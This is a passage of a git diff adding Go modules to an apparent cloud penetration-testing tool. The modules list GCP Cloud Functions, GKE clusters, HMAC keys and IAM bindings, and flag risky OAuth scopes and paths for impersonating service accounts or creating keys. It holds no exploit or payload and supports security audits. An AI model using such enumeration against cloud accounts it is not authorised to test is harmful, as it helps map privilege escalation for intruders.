info.EnvVarNames = append(info.EnvVarNames, key) + info.EnvVars = append(info.EnvVars, EnvVarInfo{ + Name: key, + Value: value, + Source: "direct", + }) + } + } + + // Extract secret environment variables + if fn.ServiceConfig.SecretEnvironmentVariables != nil { + info.SecretEnvVarCount = len(fn.ServiceConfig.SecretEnvironmentVariables) + for _, secret := range fn.ServiceConfig.SecretEnvironmentVariables { + if secret != nil { + info.SecretEnvVarNames = append(info.SecretEnvVarNames, secret.Key) + // Extract version from the secret reference + version := "latest" + if secret.Version != "" { + version = secret.Version + } + info.EnvVars = append(info.EnvVars, EnvVarInfo{ + Name: secret.Key, + Source: "secret-manager", + SecretName: secret.Secret, + SecretVersion: version, + }) + } + } + } + + // Extract secret volume names + if fn.ServiceConfig.SecretVolumes != nil { + info.SecretVolumeCount = len(fn.ServiceConfig.SecretVolumes) + for _, vol := range fn.ServiceConfig.SecretVolumes { + if vol != nil { + info.SecretVolumeNames = append(info.SecretVolumeNames, vol.Secret) + } + } + } + + // Get HTTP trigger URL from service config + info.TriggerURL = fn.ServiceConfig.Uri + } + + // Event trigger configuration + if fn.EventTrigger != nil { + info.TriggerType = "Event" + info.TriggerEventType = fn.EventTrigger.EventType + info.TriggerResource = fn.EventTrigger.PubsubTopic + if info.TriggerResource == "" { + info.TriggerResource = fn.EventTrigger.Channel + } + } else if info.TriggerURL != "" { + info.TriggerType = "HTTP" + } + + info.Description = fn.Description + info.UpdateTime = fn.UpdateTime + + return info +} + +// getFunctionIAMPolicy retrieves the IAM policy for a function +func (fs *FunctionsService) getFunctionIAMPolicy(service *cloudfunctions.Service, functionName string) (*cloudfunctions.Policy, error) { + ctx := context.Background() + + policy, err := service.Projects.Locations.Functions.GetIamPolicy(functionName).Context(ctx).Do() + if err != nil { + return 
nil, err + } + + return policy, nil +} + +// parseIAMBindings extracts all IAM bindings and checks for public access +func parseIAMBindings(policy *cloudfunctions.Policy) ([]IAMBinding, bool) { + var bindings []IAMBinding + isPublic := false + + for _, binding := range policy.Bindings { + for _, member := range binding.Members { + bindings = append(bindings, IAMBinding{ + Role: binding.Role, + Member: member, + }) + + // Check for public access on invoker roles + if (binding.Role == "roles/cloudfunctions.invoker" || + binding.Role == "roles/run.invoker") && + (member == "allUsers" || member == "allAuthenticatedUsers") { + isPublic = true + } + } + } + + return bindings, isPublic +} + +// extractFunctionName extracts just the function name from the full resource name +func extractFunctionName(fullName string) string { + parts := strings.Split(fullName, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return fullName +} + +// parseMemoryMB parses a memory string like "256M" or "1G" to MB +func parseMemoryMB(memStr string) (int64, error) { + memStr = strings.TrimSpace(memStr) + if len(memStr) == 0 { + return 0, fmt.Errorf("empty memory string") + } + + unit := memStr[len(memStr)-1] + valueStr := memStr[:len(memStr)-1] + + var value int64 + _, err := fmt.Sscanf(valueStr, "%d", &value) + if err != nil { + return 0, err + } + + switch unit { + case 'M', 'm': + return value, nil + case 'G', 'g': + return value * 1024, nil + case 'K', 'k': + return value / 1024, nil + default: + return 0, fmt.Errorf("unknown unit: %c", unit) + } +} diff --git a/gcp/services/gkeService/gkeService.go b/gcp/services/gkeService/gkeService.go new file mode 100644 index 00000000..48208de0 --- /dev/null +++ b/gcp/services/gkeService/gkeService.go @@ -0,0 +1,426 @@ +package gkeservice + +import ( + "context" + "fmt" + "strings" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + container 
"google.golang.org/api/container/v1" +) + +type GKEService struct { + session *gcpinternal.SafeSession +} + +// New creates a new GKEService (legacy - uses ADC directly) +func New() *GKEService { + return &GKEService{} +} + +// NewWithSession creates a GKEService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *GKEService { + return &GKEService{session: session} +} + +// getService returns a container service, using session if available +func (gs *GKEService) getService(ctx context.Context) (*container.Service, error) { + if gs.session != nil { + return sdk.CachedGetContainerService(ctx, gs.session) + } + return container.NewService(ctx) +} + +// ClusterInfo holds GKE cluster details with security-relevant information +type ClusterInfo struct { + // Basic info + Name string + ProjectID string + Location string // Zone or Region + Status string + Description string + + // Version info + CurrentMasterVersion string + CurrentNodeVersion string + ReleaseChannel string + + // Network configuration + Network string + Subnetwork string + ClusterIPv4CIDR string + ServicesIPv4CIDR string + Endpoint string // Master endpoint + PrivateCluster bool + MasterAuthorizedOnly bool + MasterAuthorizedCIDRs []string + + // Security configuration + NetworkPolicy bool + PodSecurityPolicy bool // Deprecated but may still be in use + BinaryAuthorization bool + ShieldedNodes bool + SecureBoot bool + IntegrityMonitoring bool + WorkloadIdentity string // Workload Identity Pool + NodeServiceAccount string + + // Authentication + LegacyABAC bool // Legacy ABAC authorization + IssueClientCertificate bool + BasicAuthEnabled bool // Deprecated + + // Logging and Monitoring + LoggingService string + MonitoringService string + + // Node pool info (aggregated) + NodePoolCount int + TotalNodeCount int + AutoscalingEnabled bool + + // GKE Autopilot + Autopilot bool + + // Node Auto-provisioning + NodeAutoProvisioning bool + + // Maintenance 
configuration + MaintenanceWindow string + MaintenanceExclusions []string + + // Addons + ConfigConnector bool + IstioEnabled bool // Anthos Service Mesh / Istio + + // Security issues detected + SecurityIssues []string +} + +// NodePoolInfo holds node pool details +type NodePoolInfo struct { + ClusterName string + Name string + ProjectID string + Location string + Status string + NodeCount int + MachineType string + DiskSizeGb int64 + DiskType string + ImageType string + ServiceAccount string + AutoRepair bool + AutoUpgrade bool + SecureBoot bool + IntegrityMonitoring bool + Preemptible bool + Spot bool + OAuthScopes []string + // Pentest-specific fields + HasCloudPlatformScope bool // Full access to GCP + ScopeSummary string // Human-readable scope summary (e.g., "Full Access", "Restricted") + RiskyScopes []string // Scopes that enable attacks +} + +// Clusters retrieves all GKE clusters in a project +func (gs *GKEService) Clusters(projectID string) ([]ClusterInfo, []NodePoolInfo, error) { + ctx := context.Background() + + service, err := gs.getService(ctx) + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + // List clusters across all locations + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + + resp, err := service.Projects.Locations.Clusters.List(parent).Do() + if err != nil { + return nil, nil, gcpinternal.ParseGCPError(err, "container.googleapis.com") + } + + var clusters []ClusterInfo + var nodePools []NodePoolInfo + + for _, cluster := range resp.Clusters { + info := parseClusterInfo(cluster, projectID) + clusters = append(clusters, info) + + // Parse node pools + for _, np := range cluster.NodePools { + npInfo := parseNodePoolInfo(np, cluster.Name, projectID, cluster.Location) + nodePools = append(nodePools, npInfo) + } + } + + return clusters, nodePools, nil +} + +// parseClusterInfo extracts security-relevant information from a GKE cluster +func parseClusterInfo(cluster 
*container.Cluster, projectID string) ClusterInfo { + info := ClusterInfo{ + Name: cluster.Name, + ProjectID: projectID, + Location: cluster.Location, + Status: cluster.Status, + Description: cluster.Description, + CurrentMasterVersion: cluster.CurrentMasterVersion, + CurrentNodeVersion: cluster.CurrentNodeVersion, + Endpoint: cluster.Endpoint, + Network: cluster.Network, + Subnetwork: cluster.Subnetwork, + ClusterIPv4CIDR: cluster.ClusterIpv4Cidr, + ServicesIPv4CIDR: cluster.ServicesIpv4Cidr, + LoggingService: cluster.LoggingService, + MonitoringService: cluster.MonitoringService, + SecurityIssues: []string{}, + } + + // Release channel + if cluster.ReleaseChannel != nil { + info.ReleaseChannel = cluster.ReleaseChannel.Channel + } + + // Private cluster configuration + if cluster.PrivateClusterConfig != nil { + info.PrivateCluster = cluster.PrivateClusterConfig.EnablePrivateNodes + if cluster.PrivateClusterConfig.EnablePrivateEndpoint { + info.Endpoint = cluster.PrivateClusterConfig.PrivateEndpoint + } + } + + // Master authorized networks + if cluster.MasterAuthorizedNetworksConfig != nil { + info.MasterAuthorizedOnly = cluster.MasterAuthorizedNetworksConfig.Enabled + for _, cidr := range cluster.MasterAuthorizedNetworksConfig.CidrBlocks { + info.MasterAuthorizedCIDRs = append(info.MasterAuthorizedCIDRs, cidr.CidrBlock) + } + } + + // Network policy + if cluster.NetworkPolicy != nil { + info.NetworkPolicy = cluster.NetworkPolicy.Enabled + } + + // Binary authorization + if cluster.BinaryAuthorization != nil { + info.BinaryAuthorization = cluster.BinaryAuthorization.Enabled + } + + // Shielded nodes + if cluster.ShieldedNodes != nil { + info.ShieldedNodes = cluster.ShieldedNodes.Enabled + } + + // Workload Identity + if cluster.WorkloadIdentityConfig != nil { + info.WorkloadIdentity = cluster.WorkloadIdentityConfig.WorkloadPool + } + + // Legacy ABAC (should be disabled) + if cluster.LegacyAbac != nil { + info.LegacyABAC = cluster.LegacyAbac.Enabled + } + + // 
Master auth (legacy) + if cluster.MasterAuth != nil { + info.IssueClientCertificate = cluster.MasterAuth.ClientCertificateConfig != nil && + cluster.MasterAuth.ClientCertificateConfig.IssueClientCertificate + // Check for basic auth (deprecated) + if cluster.MasterAuth.Username != "" { + info.BasicAuthEnabled = true + } + } + + // Count node pools and nodes + info.NodePoolCount = len(cluster.NodePools) + for _, np := range cluster.NodePools { + if np.Autoscaling != nil && np.Autoscaling.Enabled { + info.AutoscalingEnabled = true + } + info.TotalNodeCount += int(np.InitialNodeCount) + + // Get node service account from first pool + if info.NodeServiceAccount == "" && np.Config != nil { + info.NodeServiceAccount = np.Config.ServiceAccount + } + + // Check shielded node config + if np.Config != nil && np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + } + + // GKE Autopilot mode + if cluster.Autopilot != nil { + info.Autopilot = cluster.Autopilot.Enabled + } + + // Node Auto-provisioning + if cluster.Autoscaling != nil { + info.NodeAutoProvisioning = cluster.Autoscaling.EnableNodeAutoprovisioning + } + + // Maintenance configuration + if cluster.MaintenancePolicy != nil && cluster.MaintenancePolicy.Window != nil { + window := cluster.MaintenancePolicy.Window + if window.DailyMaintenanceWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Daily at %s", window.DailyMaintenanceWindow.StartTime) + } else if window.RecurringWindow != nil { + info.MaintenanceWindow = fmt.Sprintf("Recurring: %s", window.RecurringWindow.Recurrence) + } + // Maintenance exclusions + for name := range window.MaintenanceExclusions { + info.MaintenanceExclusions = append(info.MaintenanceExclusions, name) + } + } + + // Addons configuration + if cluster.AddonsConfig != nil { + // Config Connector + if 
cluster.AddonsConfig.ConfigConnectorConfig != nil { + info.ConfigConnector = cluster.AddonsConfig.ConfigConnectorConfig.Enabled + } + // Note: IstioConfig was deprecated and removed from the GKE API + // Anthos Service Mesh (ASM) is now the recommended approach + } + + // Identify security issues + info.SecurityIssues = identifySecurityIssues(info) + + return info +} + +// parseNodePoolInfo extracts information from a node pool +func parseNodePoolInfo(np *container.NodePool, clusterName, projectID, location string) NodePoolInfo { + info := NodePoolInfo{ + ClusterName: clusterName, + Name: np.Name, + ProjectID: projectID, + Location: location, + Status: np.Status, + NodeCount: int(np.InitialNodeCount), + } + + if np.Config != nil { + info.MachineType = np.Config.MachineType + info.DiskSizeGb = np.Config.DiskSizeGb + info.DiskType = np.Config.DiskType + info.ImageType = np.Config.ImageType + info.ServiceAccount = np.Config.ServiceAccount + info.OAuthScopes = np.Config.OauthScopes + info.Preemptible = np.Config.Preemptible + info.Spot = np.Config.Spot + + if np.Config.ShieldedInstanceConfig != nil { + info.SecureBoot = np.Config.ShieldedInstanceConfig.EnableSecureBoot + info.IntegrityMonitoring = np.Config.ShieldedInstanceConfig.EnableIntegrityMonitoring + } + + // Analyze OAuth scopes for risky permissions + info.HasCloudPlatformScope, info.ScopeSummary, info.RiskyScopes = analyzeOAuthScopes(np.Config.OauthScopes) + } + + if np.Management != nil { + info.AutoRepair = np.Management.AutoRepair + info.AutoUpgrade = np.Management.AutoUpgrade + } + + return info +} + +// analyzeOAuthScopes identifies risky OAuth scopes and returns a summary +func analyzeOAuthScopes(scopes []string) (hasCloudPlatform bool, scopeSummary string, riskyScopes []string) { + riskyPatterns := map[string]string{ + "https://www.googleapis.com/auth/cloud-platform": "Full GCP access", + "https://www.googleapis.com/auth/compute": "Full Compute Engine access", + 
"https://www.googleapis.com/auth/devstorage.full_control": "Full Cloud Storage access", + "https://www.googleapis.com/auth/devstorage.read_write": "Read/write Cloud Storage", + "https://www.googleapis.com/auth/logging.admin": "Logging admin (can delete logs)", + "https://www.googleapis.com/auth/source.full_control": "Full source repo access", + "https://www.googleapis.com/auth/sqlservice.admin": "Cloud SQL admin", + } + + for _, scope := range scopes { + if scope == "https://www.googleapis.com/auth/cloud-platform" { + hasCloudPlatform = true + } + if desc, found := riskyPatterns[scope]; found { + riskyScopes = append(riskyScopes, fmt.Sprintf("%s: %s", scope, desc)) + } + } + + // Determine scope summary + // GKE default scopes (when not explicitly set) typically include: + // - logging.write, monitoring, devstorage.read_only, service.management.readonly, servicecontrol, trace.append + if hasCloudPlatform { + scopeSummary = "Full Access" + } else if len(riskyScopes) > 0 { + // Has some risky scopes but not full access + scopeSummary = fmt.Sprintf("Broad (%d risky)", len(riskyScopes)) + } else if len(scopes) == 0 { + // Empty scopes likely means default GKE scopes (limited) + scopeSummary = "Default" + } else { + scopeSummary = "Restricted" + } + + return +} + +// identifySecurityIssues checks for common security misconfigurations +func identifySecurityIssues(cluster ClusterInfo) []string { + var issues []string + + // Public endpoint without authorized networks + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + issues = append(issues, "Public endpoint without master authorized networks") + } + + // Legacy ABAC enabled + if cluster.LegacyABAC { + issues = append(issues, "Legacy ABAC authorization enabled") + } + + // Basic auth enabled + if cluster.BasicAuthEnabled { + issues = append(issues, "Basic authentication enabled (deprecated)") + } + + // Client certificate + if cluster.IssueClientCertificate { + issues = append(issues, "Client certificate 
authentication enabled") + } + + // No network policy + if !cluster.NetworkPolicy { + issues = append(issues, "Network policy not enabled") + } + + // No workload identity + if cluster.WorkloadIdentity == "" { + issues = append(issues, "Workload Identity not configured") + } + + // Shielded nodes not enabled + if !cluster.ShieldedNodes { + issues = append(issues, "Shielded nodes not enabled") + } + + // Default service account on nodes + if cluster.NodeServiceAccount == "default" || + strings.HasSuffix(cluster.NodeServiceAccount, "-compute@developer.gserviceaccount.com") { + issues = append(issues, "Default service account used on nodes") + } + + // No release channel (manual upgrades) + if cluster.ReleaseChannel == "" || cluster.ReleaseChannel == "UNSPECIFIED" { + issues = append(issues, "No release channel configured") + } + + return issues +} + diff --git a/gcp/services/hmacService/hmacService.go b/gcp/services/hmacService/hmacService.go new file mode 100644 index 00000000..04d6a0b4 --- /dev/null +++ b/gcp/services/hmacService/hmacService.go @@ -0,0 +1,162 @@ +package hmacservice + +import ( + "context" + "fmt" + "time" + + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + "google.golang.org/api/storage/v1" +) + +type HMACService struct { + session *gcpinternal.SafeSession +} + +func New() *HMACService { + return &HMACService{} +} + +func NewWithSession(session *gcpinternal.SafeSession) *HMACService { + return &HMACService{session: session} +} + +// getStorageService returns a Storage service client using cached session if available +func (s *HMACService) getStorageService(ctx context.Context) (*storage.Service, error) { + if s.session != nil { + return sdk.CachedGetStorageService(ctx, s.session) + } + return storage.NewService(ctx) +} + +// HMACKeyInfo represents a GCS HMAC key (S3-compatible access) +type HMACKeyInfo struct { + AccessID string `json:"accessId"` + ProjectID string `json:"projectId"` + 
ServiceAccountEmail string `json:"serviceAccountEmail"` + State string `json:"state"` // ACTIVE, INACTIVE, DELETED + TimeCreated time.Time `json:"timeCreated"` + Updated time.Time `json:"updated"` + Etag string `json:"etag"` + // Pentest-specific fields + IsActive bool `json:"isActive"` + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ListHMACKeys lists all HMAC keys in a project +func (s *HMACService) ListHMACKeys(projectID string) ([]HMACKeyInfo, error) { + ctx := context.Background() + + storageService, err := s.getStorageService(ctx) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + var keys []HMACKeyInfo + + // List all HMAC keys for the project + req := storageService.Projects.HmacKeys.List(projectID) + err = req.Pages(ctx, func(page *storage.HmacKeysMetadata) error { + for _, key := range page.Items { + info := s.parseHMACKey(key, projectID) + keys = append(keys, info) + } + return nil + }) + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "storage.googleapis.com") + } + + return keys, nil +} + +func (s *HMACService) parseHMACKey(key *storage.HmacKeyMetadata, projectID string) HMACKeyInfo { + info := HMACKeyInfo{ + AccessID: key.AccessId, + ProjectID: projectID, + ServiceAccountEmail: key.ServiceAccountEmail, + State: key.State, + Etag: key.Etag, + IsActive: key.State == "ACTIVE", + RiskReasons: []string{}, + } + + // Parse timestamps + if key.TimeCreated != "" { + if t, err := time.Parse(time.RFC3339, key.TimeCreated); err == nil { + info.TimeCreated = t + } + } + if key.Updated != "" { + if t, err := time.Parse(time.RFC3339, key.Updated); err == nil { + info.Updated = t + } + } + + // Analyze risk + info.RiskLevel, info.RiskReasons = s.analyzeHMACKeyRisk(info) + + return info +} + +func (s *HMACService) analyzeHMACKeyRisk(key HMACKeyInfo) (string, []string) { + var reasons []string + score := 0 + + // Active keys are more risky + if key.IsActive { + 
// isDefaultComputeSA reports whether the service account email matches one of
// the Google-managed default service accounts: the Compute Engine default
// ("<project-number>-compute@developer.gserviceaccount.com") or the App Engine
// default ("<project-id>@appspot.gserviceaccount.com"). HMAC keys bound to
// these broadly-scoped accounts are flagged as higher risk.
func isDefaultComputeSA(email string) bool {
	return contains(email, "-compute@developer.gserviceaccount.com") ||
		contains(email, "@appspot.gserviceaccount.com")
}

// contains reports whether substr occurs within s. Hand-rolled (equivalent to
// strings.Contains) to avoid adding an import to this file; the original
// boolean soup duplicated containsSubstr's work, so it is reduced to the one
// case the scan below does not cover: the empty substring.
func contains(s, substr string) bool {
	// Every string contains the empty string.
	if len(substr) == 0 {
		return true
	}
	return containsSubstr(s, substr)
}

// containsSubstr performs a naive linear substring scan, returning true at the
// first index where substr matches. When substr is longer than s the loop body
// never runs and the result is false.
func containsSubstr(s, substr string) bool {
	for i := 0; i+len(substr) <= len(s); i++ {
		if s[i:i+len(substr)] == substr {
			return true
		}
	}
	return false
}
"github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/BishopFox/cloudfox/internal/gcp/sdk" + cloudidentity "google.golang.org/api/cloudidentity/v1" + crmv1 "google.golang.org/api/cloudresourcemanager/v1" + iam "google.golang.org/api/iam/v1" + "google.golang.org/api/iterator" + "google.golang.org/api/option" ) type IAMService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new IAMService (legacy - uses ADC directly) func New() *IAMService { return &IAMService{} } +// NewWithSession creates an IAMService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *IAMService { + return &IAMService{session: session} +} + +// getClientOption returns the appropriate client option based on session +func (s *IAMService) getClientOption() option.ClientOption { + if s.session != nil { + return s.session.GetClientOption() + } + return nil +} + +// getIAMService returns an IAM service using cached SDK wrapper when session is available +func (s *IAMService) getIAMService(ctx context.Context) (*iam.Service, error) { + if s.session != nil { + return sdk.CachedGetIAMService(ctx, s.session) + } + return iam.NewService(ctx) +} + +// getResourceManagerService returns a Resource Manager service using cached SDK wrapper when session is available +func (s *IAMService) getResourceManagerService(ctx context.Context) (*crmv1.Service, error) { + if s.session != nil { + return sdk.CachedGetResourceManagerService(ctx, s.session) + } + return crmv1.NewService(ctx) +} + +// getCloudIdentityService returns a Cloud Identity service using cached SDK wrapper when session is available +func (s *IAMService) getCloudIdentityService(ctx context.Context) (*cloudidentity.Service, error) { + if s.session != nil { + return sdk.CachedGetCloudIdentityService(ctx, s.session) + } + return cloudidentity.NewService(ctx) +} + // 
AncestryResource represents a single resource in the project's ancestry. type AncestryResource struct { Type string `json:"type"` Id string `json:"id"` } +// IAMCondition represents a parsed IAM condition (conditional access policy) +type IAMCondition struct { + Title string `json:"title"` + Description string `json:"description"` + Expression string `json:"expression"` +} + // PolicyBindings represents IAM policy bindings. type PolicyBinding struct { - Role string `json:"role"` - Members []string `json:"members"` - ResourceID string `json:"resourceID"` - ResourceType string - PolicyName string `json:"policyBindings"` - Condition string + Role string `json:"role"` + Members []string `json:"members"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + PolicyName string `json:"policyBindings"` + Condition string `json:"condition"` + ConditionInfo *IAMCondition `json:"conditionInfo"` // Parsed condition details + HasCondition bool `json:"hasCondition"` // True if binding has conditions + IsInherited bool `json:"isInherited"` // True if inherited from folder/org + InheritedFrom string `json:"inheritedFrom"` // Source of inheritance (folder/org ID) } type PrincipalWithRoles struct { - Name string - Type string - PolicyBindings []PolicyBinding - ResourceID string - ResourceType string + Name string `json:"name"` + Type string `json:"type"` + PolicyBindings []PolicyBinding `json:"policyBindings"` + ResourceID string `json:"resourceID"` + ResourceType string `json:"resourceType"` + // Enhanced fields + Email string `json:"email"` // Clean email without prefix + DisplayName string `json:"displayName"` // For service accounts + Description string `json:"description"` // For service accounts + Disabled bool `json:"disabled"` // For service accounts + UniqueID string `json:"uniqueId"` // For service accounts + HasKeys bool `json:"hasKeys"` // Service account has user-managed keys + KeyCount int `json:"keyCount"` // Number of user-managed keys 
+ HasCustomRoles bool `json:"hasCustomRoles"` // Has any custom roles assigned + CustomRoles []string `json:"customRoles"` // List of custom role names } -var logger internal.Logger +// ServiceAccountInfo represents detailed info about a service account +type ServiceAccountInfo struct { + Email string `json:"email"` + Name string `json:"name"` // Full resource name + ProjectID string `json:"projectId"` + UniqueID string `json:"uniqueId"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Disabled bool `json:"disabled"` + OAuth2ClientID string `json:"oauth2ClientId"` + // Key information + HasKeys bool `json:"hasKeys"` + KeyCount int `json:"keyCount"` + Keys []ServiceAccountKeyInfo `json:"keys"` + // Role information + Roles []string `json:"roles"` + HasCustomRoles bool `json:"hasCustomRoles"` + CustomRoles []string `json:"customRoles"` + HasHighPrivilege bool `json:"hasHighPrivilege"` + HighPrivRoles []string `json:"highPrivRoles"` + // Pentest: Impersonation information + CanBeImpersonatedBy []string `json:"canBeImpersonatedBy"` // Principals who can impersonate this SA + CanCreateKeysBy []string `json:"canCreateKeysBy"` // Principals who can create keys for this SA + CanGetAccessTokenBy []string `json:"canGetAccessTokenBy"` // Principals with getAccessToken + CanSignBlobBy []string `json:"canSignBlobBy"` // Principals with signBlob + CanSignJwtBy []string `json:"canSignJwtBy"` // Principals with signJwt + HasImpersonationRisk bool `json:"hasImpersonationRisk"` // True if any impersonation path exists + ImpersonationRiskLevel string `json:"impersonationRiskLevel"` // CRITICAL, HIGH, MEDIUM, LOW +} + +// SAImpersonationInfo represents who can impersonate/abuse a service account +type SAImpersonationInfo struct { + ServiceAccount string `json:"serviceAccount"` + ProjectID string `json:"projectId"` + TokenCreators []string `json:"tokenCreators"` // iam.serviceAccounts.getAccessToken + KeyCreators []string `json:"keyCreators"` // 
iam.serviceAccountKeys.create + SignBlobUsers []string `json:"signBlobUsers"` // iam.serviceAccounts.signBlob + SignJwtUsers []string `json:"signJwtUsers"` // iam.serviceAccounts.signJwt + ImplicitDelegators []string `json:"implicitDelegators"` // iam.serviceAccounts.implicitDelegation + ActAsUsers []string `json:"actAsUsers"` // iam.serviceAccounts.actAs + SAAdmins []string `json:"saAdmins"` // iam.serviceAccounts.* (full admin) + RiskLevel string `json:"riskLevel"` + RiskReasons []string `json:"riskReasons"` +} + +// ServiceAccountKeyInfo represents a service account key +type ServiceAccountKeyInfo struct { + Name string `json:"name"` + KeyAlgorithm string `json:"keyAlgorithm"` + KeyOrigin string `json:"keyOrigin"` // GOOGLE_PROVIDED or USER_PROVIDED + KeyType string `json:"keyType"` // USER_MANAGED or SYSTEM_MANAGED + ValidAfter time.Time `json:"validAfter"` + ValidBefore time.Time `json:"validBefore"` + Disabled bool `json:"disabled"` +} + +// CustomRole represents a custom IAM role +type CustomRole struct { + Name string `json:"name"` + Title string `json:"title"` + Description string `json:"description"` + IncludedPermissions []string `json:"includedPermissions"` + Stage string `json:"stage"` // ALPHA, BETA, GA, DEPRECATED, DISABLED + Deleted bool `json:"deleted"` + Etag string `json:"etag"` + ProjectID string `json:"projectId"` // Empty if org-level + OrgID string `json:"orgId"` // Empty if project-level + IsProjectLevel bool `json:"isProjectLevel"` + PermissionCount int `json:"permissionCount"` +} + +// GroupMember represents a member of a Google Group +type GroupMember struct { + Email string `json:"email"` + Type string `json:"type"` // USER, SERVICE_ACCOUNT, GROUP (nested) + Role string `json:"role"` // OWNER, MANAGER, MEMBER + Status string `json:"status"` // ACTIVE, SUSPENDED, etc. 
+ IsExternal bool `json:"isExternal"` // External to the organization +} + +// GroupInfo represents a Google Group (for tracking group memberships) +type GroupInfo struct { + Email string `json:"email"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Roles []string `json:"roles"` // Roles assigned to this group + ProjectID string `json:"projectId"` + Members []GroupMember `json:"members"` // Direct members of this group + NestedGroups []string `json:"nestedGroups"` // Groups that are members of this group + MemberCount int `json:"memberCount"` // Total direct members + HasNestedGroups bool `json:"hasNestedGroups"` + MembershipEnumerated bool `json:"membershipEnumerated"` // Whether we successfully enumerated members +} + +// CombinedIAMData holds all IAM-related data for a project +type CombinedIAMData struct { + Principals []PrincipalWithRoles `json:"principals"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + InheritedRoles []PolicyBinding `json:"inheritedRoles"` +} + +var logger = internal.NewLogger() -func projectAncestry(projectID string) ([]AncestryResource, error) { +func (s *IAMService) projectAncestry(projectID string) ([]AncestryResource, error) { ctx := context.Background() - projectsClient, err := resourcemanager.NewProjectsClient(ctx) + + // Use the v1 GetAncestry API which only requires project-level read permissions + // This avoids needing resourcemanager.folders.get on each folder in the hierarchy + crmService, err := s.getResourceManagerService(ctx) if err != nil { - return nil, fmt.Errorf("failed to create projects client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer projectsClient.Close() - foldersClient, err := resourcemanager.NewFoldersClient(ctx) + resp, err := crmService.Projects.GetAncestry(projectID, 
&crmv1.GetAncestryRequest{}).Context(ctx).Do() if err != nil { - return nil, fmt.Errorf("failed to create folders client: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } - defer foldersClient.Close() - resourceID := "projects/" + projectID + // GetAncestry returns ancestors from bottom to top (project first, then parent folders, then org) + // We need to reverse to get org -> folders -> project order var ancestry []AncestryResource - - for { - if strings.HasPrefix(resourceID, "organizations/") { - ancestry = append(ancestry, AncestryResource{Type: "organization", Id: strings.TrimPrefix(resourceID, "organizations/")}) - break - } else if strings.HasPrefix(resourceID, "folders/") { - resp, err := foldersClient.GetFolder(ctx, &resourcemanagerpb.GetFolderRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access folder %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - break // Stop processing further if a folder is inaccessible - } - ancestry = append(ancestry, AncestryResource{Type: "folder", Id: strings.TrimPrefix(resp.Name, "folders/")}) - resourceID = resp.Parent - } else if strings.HasPrefix(resourceID, "projects/") { - resp, err := projectsClient.GetProject(ctx, &resourcemanagerpb.GetProjectRequest{Name: resourceID}) - if err != nil { - logger.ErrorM(fmt.Sprintf("failed to access project %s, %v", resourceID, err), globals.GCP_IAM_MODULE_NAME) - return nil, fmt.Errorf("failed to get project: %v", err) - } - ancestry = append(ancestry, AncestryResource{Type: "project", Id: strings.TrimPrefix(resp.Name, "projects/")}) - resourceID = resp.Parent - } else { - return nil, fmt.Errorf("unknown resource type for: %s", resourceID) + for i := len(resp.Ancestor) - 1; i >= 0; i-- { + ancestor := resp.Ancestor[i] + if ancestor.ResourceId != nil { + ancestry = append(ancestry, AncestryResource{ + Type: ancestor.ResourceId.Type, + Id: ancestor.ResourceId.Id, + }) } } - // Reverse the slice as 
we've built it from child to ancestor - for i, j := 0, len(ancestry)-1; i < j; i, j = i+1, j-1 { - ancestry[i], ancestry[j] = ancestry[j], ancestry[i] - } - return ancestry, nil } // Policies fetches IAM policy for a given resource and all policies in resource ancestry func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyBinding, error) { ctx := context.Background() - client, err := resourcemanager.NewProjectsClient(ctx) + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } if err != nil { - return nil, fmt.Errorf("resourcemanager.NewProjectsClient: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } defer client.Close() @@ -124,7 +282,7 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB // Fetch the IAM policy for the resource policy, err := client.GetIamPolicy(ctx, req) if err != nil { - return nil, fmt.Errorf("client.GetIamPolicy: %v", err) + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } // Assemble the policy bindings @@ -145,17 +303,50 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB } func determinePrincipalType(member string) string { - if strings.HasPrefix(member, "user:") { + switch { + case strings.HasPrefix(member, "user:"): return "User" - } else if strings.HasPrefix(member, "serviceAccount:") { + case strings.HasPrefix(member, "serviceAccount:"): return "ServiceAccount" - } else if strings.HasPrefix(member, "group:") { + case strings.HasPrefix(member, "group:"): return "Group" - } else { + case strings.HasPrefix(member, "domain:"): + return "Domain" + case member == "allUsers": + return 